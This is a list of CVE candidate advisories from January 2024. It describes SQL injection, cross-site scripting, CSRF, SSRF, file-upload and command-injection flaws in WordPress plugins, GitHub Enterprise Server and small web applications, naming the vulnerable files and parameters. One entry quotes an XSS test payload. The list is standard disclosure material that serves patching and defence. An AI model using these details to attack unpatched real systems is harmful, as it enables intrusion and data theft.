CVE 2024 512 Candidate The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.87. This is due to missing or incorrect nonce validation on the add_to_wishlist function. This makes it possible for unauthenticated attackers to add items to user wishlists via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88 | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b2ff2954-f494-4cd7-9f29-ee0e8551e339?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b2ff2954-f494-4cd7-9f29-ee0e8551e339?source=cve Assigned (20240112)
CVE 2024 511 Candidate The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.87. This is due to missing or incorrect nonce validation on the wpr_update_form_action_meta function. This makes it possible for unauthenticated attackers to post metadata via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88 | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/dc8bef03-51e0-4448-bddd-85300104e875?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/dc8bef03-51e0-4448-bddd-85300104e875?source=cve Assigned (20240112)
CVE 2024 510 Candidate A vulnerability, which was classified as critical, has been found in HaoKeKeJi YiQiNiu up to 3.1. Affected by this issue is the function http_post of the file /application/pay/controller/Api.php. The manipulation of the argument url leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250652. MISC:https://note.zhaoj.in/share/gBtNhBb39u9u | URL:https://note.zhaoj.in/share/gBtNhBb39u9u | MISC:https://vuldb.com/?ctiid.250652 | URL:https://vuldb.com/?ctiid.250652 | MISC:https://vuldb.com/?id.250652 | URL:https://vuldb.com/?id.250652 Assigned (20240112)
CVE 2024 509 Candidate The WP 404 Auto Redirect to Similar Post plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘request’ parameter in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset/3031134/wp-404-auto-redirect-to-similar-post/trunk/includes/ajax.php | URL:https://plugins.trac.wordpress.org/changeset/3031134/wp-404-auto-redirect-to-similar-post/trunk/includes/ajax.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6eef5549-3f89-4d6f-8c4e-6e4ee6082042?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6eef5549-3f89-4d6f-8c4e-6e4ee6082042?source=cve Assigned (20240112)
CVE 2024 508 Candidate The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Pricing Table Elementor Widget in all versions up to, and including, 2.10.27 due to insufficient input sanitization and output escaping on the user supplied link URL. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/themeisle-companion/trunk/vendor/codeinwp/elementor-extra-widgets/widgets/elementor/pricing-table.php#L1010 | URL:https://plugins.trac.wordpress.org/browser/themeisle-companion/trunk/vendor/codeinwp/elementor-extra-widgets/widgets/elementor/pricing-table.php#L1010 | MISC:https://plugins.trac.wordpress.org/browser/themeisle-companion/trunk/vendor/codeinwp/elementor-extra-widgets/widgets/elementor/pricing-table.php#L1019 | URL:https://plugins.trac.wordpress.org/browser/themeisle-companion/trunk/vendor/codeinwp/elementor-extra-widgets/widgets/elementor/pricing-table.php#L1019 | MISC:https://plugins.trac.wordpress.org/changeset/3021959/ | URL:https://plugins.trac.wordpress.org/changeset/3021959/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ecc5a17e-c716-48bd-9b4d-49d870ae6bf3?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ecc5a17e-c716-48bd-9b4d-49d870ae6bf3?source=cve Assigned (20240112)
CVE 2024 507 Candidate An attacker with access to a Management Console user account with the editor role could escalate privileges through a command injection vulnerability in the Management Console. This vulnerability affected all versions of GitHub Enterprise Server and was fixed in versions 3.11.3, 3.10.5, 3.9.8, and 3.8.13 This vulnerability was reported via the GitHub Bug Bounty program. MISC:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.5 | URL:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.5 | MISC:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.3 | URL:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.3 | MISC:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.13 | URL:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.13 | MISC:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.8 | URL:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.8 Assigned (20240112)
CVE 2024 506 Candidate The Elementor Website Builder – More than Just a Page Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the $instance[alt] parameter in the get_image_alt function in all versions up to, and including, 3.18.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/browser/elementor/tags/3.18.3/includes/controls/groups/image-size.php#L119 | URL:https://plugins.trac.wordpress.org/browser/elementor/tags/3.18.3/includes/controls/groups/image-size.php#L119 | MISC:https://plugins.trac.wordpress.org/browser/elementor/tags/3.18.3/includes/controls/media.php#L381 | URL:https://plugins.trac.wordpress.org/browser/elementor/tags/3.18.3/includes/controls/media.php#L381 | MISC:https://plugins.trac.wordpress.org/changeset/3024999/elementor/trunk/includes/controls/groups/image-size.php | URL:https://plugins.trac.wordpress.org/changeset/3024999/elementor/trunk/includes/controls/groups/image-size.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/4473d3f6-e324-40f5-b92b-167f76b17332?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/4473d3f6-e324-40f5-b92b-167f76b17332?source=cve Assigned (20240112)
CVE 2024 505 Candidate A vulnerability was found in ZhongFuCheng3y Austin 1.0 and classified as critical. This issue affects the function getFile of the file com/java3y/austin/web/controller/MaterialController.java of the component Upload Material Menu. The manipulation leads to unrestricted upload. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250619. MISC:https://github.com/biantaibao/Austin-CMS-report/blob/main/File%20Upload%20Vulnerabilities.md | URL:https://github.com/biantaibao/Austin-CMS-report/blob/main/File%20Upload%20Vulnerabilities.md | MISC:https://vuldb.com/?ctiid.250619 | URL:https://vuldb.com/?ctiid.250619 | MISC:https://vuldb.com/?id.250619 | URL:https://vuldb.com/?id.250619 Assigned (20240112)
CVE 2024 504 Candidate A vulnerability has been found in code-projects Simple Online Hotel Reservation System 1.0 and classified as problematic. This vulnerability affects unknown code of the file add_reserve.php of the component Make a Reservation Page. The manipulation of the argument Firstname/Lastname with the input <script>alert(1)</script> leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250618 is the identifier assigned to this vulnerability. MISC:https://drive.google.com/file/d/1BIa4jfZ9FbW9d7O3tRdAKF3tb6b5NUB6/view?usp=sharing | URL:https://drive.google.com/file/d/1BIa4jfZ9FbW9d7O3tRdAKF3tb6b5NUB6/view?usp=sharing | MISC:https://vuldb.com/?ctiid.250618 | URL:https://vuldb.com/?ctiid.250618 | MISC:https://vuldb.com/?id.250618 | URL:https://vuldb.com/?id.250618 Assigned (20240112)
CVE 2024 503 Candidate A vulnerability was found in code-projects Online FIR System 1.0. It has been classified as problematic. This affects an unknown part of the file registercomplaint.php. The manipulation of the argument Name/Address leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250611. MISC:https://drive.google.com/file/d/1n9Zas-iSOfKVMN3UzPyVGgQgCmig2A5I/view?usp=sharing | URL:https://drive.google.com/file/d/1n9Zas-iSOfKVMN3UzPyVGgQgCmig2A5I/view?usp=sharing | MISC:https://vuldb.com/?ctiid.250611 | URL:https://vuldb.com/?ctiid.250611 | MISC:https://vuldb.com/?id.250611 | URL:https://vuldb.com/?id.250611 Assigned (20240112)
CVE 2024 502 Candidate A vulnerability was found in SourceCodester House Rental Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file manage_user.php of the component Edit User. The manipulation of the argument id/name/username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250610 is the identifier assigned to this vulnerability. MISC:https://drive.google.com/file/d/1DGb371-evTgstf42t3u2dOM4KBEt5mPw/view?usp=sharing | URL:https://drive.google.com/file/d/1DGb371-evTgstf42t3u2dOM4KBEt5mPw/view?usp=sharing | MISC:https://vuldb.com/?ctiid.250610 | URL:https://vuldb.com/?ctiid.250610 | MISC:https://vuldb.com/?id.250610 | URL:https://vuldb.com/?id.250610 Assigned (20240112)
CVE 2024 501 Candidate A vulnerability has been found in SourceCodester House Rental Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Manage Invoice Details. The manipulation of the argument Invoice leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250609 was assigned to this vulnerability. MISC:https://drive.google.com/file/d/1xEenTDcXwNYdOxY8kdQ142nRnbcHrTRv/view?usp=sharing | URL:https://drive.google.com/file/d/1xEenTDcXwNYdOxY8kdQ142nRnbcHrTRv/view?usp=sharing | MISC:https://vuldb.com/?ctiid.250609 | URL:https://vuldb.com/?ctiid.250609 | MISC:https://vuldb.com/?id.250609 | URL:https://vuldb.com/?id.250609 Assigned (20240112)
CVE 2024 500 Candidate A vulnerability, which was classified as problematic, was found in SourceCodester House Rental Management System 1.0. Affected is an unknown function of the component Manage Tenant Details. The manipulation of the argument Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250608. MISC:https://drive.google.com/file/d/1z30nTAfoX58NqwIMXyHb3LB6Pv2bEm5v/view?usp=sharing | URL:https://drive.google.com/file/d/1z30nTAfoX58NqwIMXyHb3LB6Pv2bEm5v/view?usp=sharing | MISC:https://vuldb.com/?ctiid.250608 | URL:https://vuldb.com/?ctiid.250608 | MISC:https://vuldb.com/?id.250608 | URL:https://vuldb.com/?id.250608 Assigned (20240112)
CVE 2024 499 Candidate A vulnerability, which was classified as problematic, has been found in SourceCodester House Rental Management System 1.0. This issue affects some unknown processing of the file index.php. The manipulation of the argument page leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250607. MISC:https://drive.google.com/file/d/1DTGd_IWdS_tMOQN0Pt1-MeZ4Yv3tXiRt/view?usp=sharing | URL:https://drive.google.com/file/d/1DTGd_IWdS_tMOQN0Pt1-MeZ4Yv3tXiRt/view?usp=sharing | MISC:https://vuldb.com/?ctiid.250607 | URL:https://vuldb.com/?ctiid.250607 | MISC:https://vuldb.com/?id.250607 | URL:https://vuldb.com/?id.250607 Assigned (20240112)
CVE 2024 498 Candidate A vulnerability was found in Project Worlds Lawyer Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file searchLawyer.php. The manipulation of the argument experience leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250603. MISC:https://github.com/laoquanshi/heishou/blob/main/lawyermanagementsystem.doc | URL:https://github.com/laoquanshi/heishou/blob/main/lawyermanagementsystem.doc | MISC:https://vuldb.com/?ctiid.250603 | URL:https://vuldb.com/?ctiid.250603 | MISC:https://vuldb.com/?id.250603 | URL:https://vuldb.com/?id.250603 Assigned (20240112)
CVE 2024 497 Candidate A vulnerability was found in Campcodes Student Information System 1.0. It has been classified as critical. Affected is an unknown function of the file /classes/Users.php?f=save. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250602 is the identifier assigned to this vulnerability. MISC:https://github.com/laoquanshi/heishou/blob/main/SQL%20injection%20exists%20in%20student%20information%20system%20.docx | URL:https://github.com/laoquanshi/heishou/blob/main/SQL%20injection%20exists%20in%20student%20information%20system%20.docx | MISC:https://vuldb.com/?ctiid.250602 | URL:https://vuldb.com/?ctiid.250602 | MISC:https://vuldb.com/?id.250602 | URL:https://vuldb.com/?id.250602 Assigned (20240112)
CVE 2024 496 Candidate A vulnerability was found in Kashipara Billing Software 1.0 and classified as critical. This issue affects some unknown processing of the file item_list_edit.php of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250601 was assigned to this vulnerability. MISC:https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(1).docx | URL:https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(1).docx | MISC:https://vuldb.com/?ctiid.250601 | URL:https://vuldb.com/?ctiid.250601 | MISC:https://vuldb.com/?id.250601 | URL:https://vuldb.com/?id.250601 Assigned (20240112)
CVE 2024 495 Candidate A vulnerability has been found in Kashipara Billing Software 1.0 and classified as critical. This vulnerability affects unknown code of the file party_submit.php of the component HTTP POST Request Handler. The manipulation of the argument party_name leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250600. MISC:https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(2).docx | URL:https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(2).docx | MISC:https://vuldb.com/?ctiid.250600 | URL:https://vuldb.com/?ctiid.250600 | MISC:https://vuldb.com/?id.250600 | URL:https://vuldb.com/?id.250600 Assigned (20240112)
CVE 2024 494 Candidate A vulnerability, which was classified as critical, was found in Kashipara Billing Software 1.0. This affects an unknown part of the file material_bill.php of the component HTTP POST Request Handler. The manipulation of the argument itemtypeid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250599. MISC:https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(3).docx | URL:https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(3).docx | MISC:https://vuldb.com/?ctiid.250599 | URL:https://vuldb.com/?ctiid.250599 | MISC:https://vuldb.com/?id.250599 | URL:https://vuldb.com/?id.250599 Assigned (20240112)
CVE 2024 493 Candidate A vulnerability, which was classified as critical, has been found in Kashipara Billing Software 1.0. Affected by this issue is some unknown functionality of the file submit_delivery_list.php of the component HTTP POST Request Handler. The manipulation of the argument customer_details leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250598 is the identifier assigned to this vulnerability. MISC:https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(5).docx | URL:https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20SQL%20injection%20vulnerability(5).docx | MISC:https://vuldb.com/?ctiid.250598 | URL:https://vuldb.com/?ctiid.250598 | MISC:https://vuldb.com/?id.250598 | URL:https://vuldb.com/?id.250598 Assigned (20240112)
CVE 2024 492 Candidate A vulnerability classified as critical was found in Kashipara Billing Software 1.0. Affected by this vulnerability is an unknown functionality of the file buyer_detail_submit.php of the component HTTP POST Request Handler. The manipulation of the argument gstn_no leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250597 was assigned to this vulnerability. MISC:https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20sql.docx | URL:https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20sql.docx | MISC:https://vuldb.com/?ctiid.250597 | URL:https://vuldb.com/?ctiid.250597 | MISC:https://vuldb.com/?id.250597 | URL:https://vuldb.com/?id.250597 Assigned (20240112)
CVE 2024 491 Candidate A vulnerability classified as problematic has been found in Huaxia ERP up to 3.1. Affected is an unknown function of the file src/main/java/com/jsh/erp/controller/UserController.java. The manipulation leads to weak password recovery. It is possible to launch the attack remotely. Upgrading to version 3.2 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-250596. MISC:https://github.com/laoquanshi/puppy/blob/main/Logic%20loopholes%20in%20Huaxia%20ERP%20can%20lead%20to%20unauthorized%20access2.md | URL:https://github.com/laoquanshi/puppy/blob/main/Logic%20loopholes%20in%20Huaxia%20ERP%20can%20lead%20to%20unauthorized%20access2.md | MISC:https://vuldb.com/?ctiid.250596 | URL:https://vuldb.com/?ctiid.250596 | MISC:https://vuldb.com/?id.250596 | URL:https://vuldb.com/?id.250596 Assigned (20240112)
CVE 2024 490 Candidate A vulnerability was found in Huaxia ERP up to 3.1. It has been rated as problematic. This issue affects some unknown processing of the file /user/getAllList. The manipulation leads to information disclosure. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.2 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-250595. MISC:https://github.com/laoquanshi/puppy/blob/main/Logic%20loopholes%20in%20Huaxia%20ERP%20can%20lead%20to%20unauthorized%20access.md | URL:https://github.com/laoquanshi/puppy/blob/main/Logic%20loopholes%20in%20Huaxia%20ERP%20can%20lead%20to%20unauthorized%20access.md | MISC:https://vuldb.com/?ctiid.250595 | URL:https://vuldb.com/?ctiid.250595 | MISC:https://vuldb.com/?id.250595 | URL:https://vuldb.com/?id.250595 Assigned (20240112)
CVE 2024 489 Candidate A vulnerability was found in code-projects Fighting Cock Information System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/action/edit_chicken.php. The manipulation of the argument ref leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250594 is the identifier assigned to this vulnerability. MISC:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL3.pdf | URL:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL3.pdf | MISC:https://vuldb.com/?ctiid.250594 | URL:https://vuldb.com/?ctiid.250594 | MISC:https://vuldb.com/?id.250594 | URL:https://vuldb.com/?id.250594 Assigned (20240112)
CVE 2024 488 Candidate A vulnerability was found in code-projects Fighting Cock Information System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/action/new-feed.php. The manipulation of the argument type_feed leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250593 was assigned to this vulnerability. MISC:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL4.pdf | URL:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL4.pdf | MISC:https://vuldb.com/?ctiid.250593 | URL:https://vuldb.com/?ctiid.250593 | MISC:https://vuldb.com/?id.250593 | URL:https://vuldb.com/?id.250593 Assigned (20240112)
CVE 2024 487 Candidate A vulnerability was found in code-projects Fighting Cock Information System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/action/delete-vaccine.php. The manipulation of the argument ref leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250592. MISC:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL2.pdf | URL:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL2.pdf | MISC:https://vuldb.com/?ctiid.250592 | URL:https://vuldb.com/?ctiid.250592 | MISC:https://vuldb.com/?id.250592 | URL:https://vuldb.com/?id.250592 Assigned (20240112)
CVE 2024 486 Candidate A vulnerability has been found in code-projects Fighting Cock Information System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/action/add_con.php. The manipulation of the argument chicken leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250591. MISC:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL1.pdf | URL:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL1.pdf | MISC:https://vuldb.com/?ctiid.250591 | URL:https://vuldb.com/?ctiid.250591 | MISC:https://vuldb.com/?id.250591 | URL:https://vuldb.com/?id.250591 Assigned (20240112)
CVE 2024 485 Candidate A vulnerability, which was classified as critical, was found in code-projects Fighting Cock Information System 1.0. Affected is an unknown function of the file admin/pages/tables/add_con.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250590 is the identifier assigned to this vulnerability. MISC:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL7.pdf | URL:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL7.pdf | MISC:https://vuldb.com/?ctiid.250590 | URL:https://vuldb.com/?ctiid.250590 | MISC:https://vuldb.com/?id.250590 | URL:https://vuldb.com/?id.250590 Assigned (20240112)
CVE 2024 484 Candidate A vulnerability, which was classified as critical, has been found in code-projects Fighting Cock Information System 1.0. This issue affects some unknown processing of the file admin/action/update_mother.php. The manipulation of the argument age_mother leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250589 was assigned to this vulnerability. MISC:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL6.pdf | URL:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL6.pdf | MISC:https://vuldb.com/?ctiid.250589 | URL:https://vuldb.com/?ctiid.250589 | MISC:https://vuldb.com/?id.250589 | URL:https://vuldb.com/?id.250589 Assigned (20240112)
CVE 2024 483 Candidate A vulnerability classified as critical was found in Taokeyun up to 1.0.5. This vulnerability affects the function index of the file application/index/controller/app/Task.php of the component HTTP POST Request Handler. The manipulation of the argument cid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250588. MISC:https://note.zhaoj.in/share/dm5VSyxmQIdl | URL:https://note.zhaoj.in/share/dm5VSyxmQIdl | MISC:https://vuldb.com/?ctiid.250588 | URL:https://vuldb.com/?ctiid.250588 | MISC:https://vuldb.com/?id.250588 | URL:https://vuldb.com/?id.250588 Assigned (20240112)
CVE 2024 482 Candidate A vulnerability classified as critical has been found in Taokeyun up to 1.0.5. This affects the function index of the file application/index/controller/app/Video.php of the component HTTP POST Request Handler. The manipulation of the argument cid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250587. MISC:https://note.zhaoj.in/share/MuWxURhTIYTP | URL:https://note.zhaoj.in/share/MuWxURhTIYTP | MISC:https://vuldb.com/?ctiid.250587 | URL:https://vuldb.com/?ctiid.250587 | MISC:https://vuldb.com/?id.250587 | URL:https://vuldb.com/?id.250587 Assigned (20240112)
CVE 2024 481 Candidate A vulnerability was found in Taokeyun up to 1.0.5. It has been rated as critical. Affected by this issue is the function shopGoods of the file application/index/controller/app/store/Goods.php of the component HTTP POST Request Handler. The manipulation of the argument keyword leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250586 is the identifier assigned to this vulnerability. MISC:https://note.zhaoj.in/share/TKWDqowIoLqs | URL:https://note.zhaoj.in/share/TKWDqowIoLqs | MISC:https://vuldb.com/?ctiid.250586 | URL:https://vuldb.com/?ctiid.250586 | MISC:https://vuldb.com/?id.250586 | URL:https://vuldb.com/?id.250586 Assigned (20240112)
CVE 2024 480 Candidate A vulnerability was found in Taokeyun up to 1.0.5. It has been declared as critical. Affected by this vulnerability is the function index of the file application/index/controller/m/Drs.php of the component HTTP POST Request Handler. The manipulation of the argument cid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250585 was assigned to this vulnerability. MISC:https://note.zhaoj.in/share/0KtyJccrP3Ba | URL:https://note.zhaoj.in/share/0KtyJccrP3Ba | MISC:https://vuldb.com/?ctiid.250585 | URL:https://vuldb.com/?ctiid.250585 | MISC:https://vuldb.com/?id.250585 | URL:https://vuldb.com/?id.250585 Assigned (20240112)
CVE 2024 479 Candidate A vulnerability was found in Taokeyun up to 1.0.5. It has been classified as critical. Affected is the function login of the file application/index/controller/m/User.php of the component HTTP POST Request Handler. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250584. MISC:https://note.zhaoj.in/share/Np0ZdyKEnVOV | URL:https://note.zhaoj.in/share/Np0ZdyKEnVOV | MISC:https://vuldb.com/?ctiid.250584 | URL:https://vuldb.com/?ctiid.250584 | MISC:https://vuldb.com/?id.250584 | URL:https://vuldb.com/?id.250584 Assigned (20240112)
CVE 2024 478 Candidate A vulnerability was found in code-projects Fighting Cock Information System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/pages/edit_chicken.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250583. MISC:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL8.pdf | URL:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL8.pdf | MISC:https://vuldb.com/?ctiid.250583 | URL:https://vuldb.com/?ctiid.250583 | MISC:https://vuldb.com/?id.250583 | URL:https://vuldb.com/?id.250583 Assigned (20240112)
CVE 2024 477 Candidate A vulnerability has been found in code-projects Fighting Cock Information System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/action/update-deworm.php. The manipulation of the argument usage_deworm leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250582 is the identifier assigned to this vulnerability. MISC:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL5.pdf | URL:https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL5.pdf | MISC:https://vuldb.com/?ctiid.250582 | URL:https://vuldb.com/?ctiid.250582 | MISC:https://vuldb.com/?id.250582 | URL:https://vuldb.com/?id.250582 Assigned (20240112)
CVE 2024 476 Candidate A vulnerability, which was classified as problematic, was found in Blood Bank & Donor Management 1.0. This affects an unknown part of the file request-received-bydonar.php. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250581 was assigned to this vulnerability. MISC:https://drive.google.com/file/d/1Hvv_oKuEplp4DTcOf9xImgyPt58a8jGz/view?usp=sharing | URL:https://drive.google.com/file/d/1Hvv_oKuEplp4DTcOf9xImgyPt58a8jGz/view?usp=sharing | MISC:https://vuldb.com/?ctiid.250581 | URL:https://vuldb.com/?ctiid.250581 | MISC:https://vuldb.com/?id.250581 | URL:https://vuldb.com/?id.250581 Assigned (20240112)
